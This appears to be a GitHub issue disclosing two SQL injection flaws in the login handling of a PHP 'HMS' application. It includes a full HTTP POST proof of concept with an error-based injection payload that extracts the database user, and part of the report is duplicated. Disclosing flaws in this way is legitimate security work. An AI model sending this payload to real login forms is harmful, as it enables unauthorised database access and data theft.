You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Building environment: Apace2.4.39; MySQL5.7.26; PHP7.3.4
1.SQL injection vulnerability exists in adminlogin.php
In admin/adminlogin.php, line 6 - line 34
The front end post requests to transfer the uname and pass to the back end and assign values to $username and $password respectively.
Without filtering, directly bring $username and $password into the database for verification with the username and password in the database.
However, the variable is controllable, and the account and password entered in the input box are brought into the database to execute SQL statements, resulting in SQL injection vulnerabilities.
1.We can use sqlmap to validate
2.Manual SQL injection proof
POC
POST /adminlogin.php HTTP/1.1
Host: vulhms.test
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/adminlogin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p8jp2ja2hfplhfopqh577o2nd1
Connection: close
uname=' OR (SELECT 12 FROM(SELECT COUNT(*),CONCAT(USER(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ace&pass=admin123&login=Login
2.SQL injection vulnerability in admin.php
In admin/admin In PHP, uname and pass are assigned to variables $uname and $pass, which are then brought into the database, causing SQL injection vulnerabilities.
Hello, my brother
HMS has two SQL injection vulnerabilities
1.SQL injection vulnerability exists in adminlogin.php
In admin/adminlogin.php, line 6 - line 34
The front end post requests to transfer the uname and pass to the back end and assign values to $username and $password respectively.
Without filtering, directly bring $username and $password into the database for verification with the username and password in the database.
However, the variable is controllable, and the account and password entered in the input box are brought into the database to execute SQL statements, resulting in SQL injection vulnerabilities.
1.We can use sqlmap to validate
2.Manual SQL injection proof
2.SQL injection vulnerability in admin.php
In admin/admin In PHP, uname and pass are assigned to variables $uname and $pass, which are then brought into the database, causing SQL injection vulnerabilities.
1.We can use sqlmap to validate
2.Manual SQL injection proof
POC:
The text was updated successfully, but these errors were encountered: